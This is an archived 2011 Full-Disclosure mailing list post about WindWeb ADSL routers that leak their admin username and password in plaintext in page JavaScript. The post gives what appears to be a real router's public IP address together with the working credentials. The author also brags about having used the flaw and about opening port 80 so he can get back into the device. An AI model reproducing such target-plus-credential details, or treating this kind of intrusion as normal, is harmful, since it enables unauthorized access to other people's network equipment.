lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 13 Sep 2011 06:21:28 +1000
From: xD 0x41 <secn3t@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: WindWeb HTTPD add admin / html page insertion

Hello!
    just a quick one on a webserver used primarily and mainly in Korea.
WindWeb server / router.
This is an ADSL router wich handles 4meg/s and these routers are all the
same, can overrite the admin just like this..

demo/poc:
ok lets find a windweb... here i have simply dumped sniffed traffic... easy
as! scanning takes time :P

220.76.166.73:80: - "501 Not Implemented  Server: WindWeb/2.0  Connection:
close  Content-Type: text/html    Web Server Error Report:<HR> <H1>Server
Error: 501 Not Implemented</H1>  Operating System Error Nr:3997697: errno =
0x3d0001 <P><HR><H2>No RPM for this combination of URL and
method</H2><P><P><HR><H1>/doc/flowctrl.htm</H1><P>"

Ok lets look and oops, this aint good, admin pass is changeable in html..
also lets makesure we open port 80 and allow myself in a back.

<SCRIPT LANGUAGE="JavaScript">
var st_lan_ip = new Array(4)
var st_lan_subnet = new Array(4)
var st_lan_mac = new Array(4)
st_lan_ip[0] = "192.168.1.1"
st_lan_subnet[0] = "255.255.255.0"
st_lan_mac[0] = "00:05:C6:3A:1A:45"
var st_lan_active = "1"
<!--
var id = new Array();
 id[0]="adsl"
id[1]="user"

var pass = new Array();
pass[0]="megapass"
pass[1]="megapass"

220.76.166.73  U:adsl P:Megapass

Now I can access the port 80 and open it so i get back inside wen i like...

this was just to easy... cmon isp's lift your game... plaintext and, albeit
this is old now but i have been busy using it you see.. anyhow have a happy
route.
xd

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ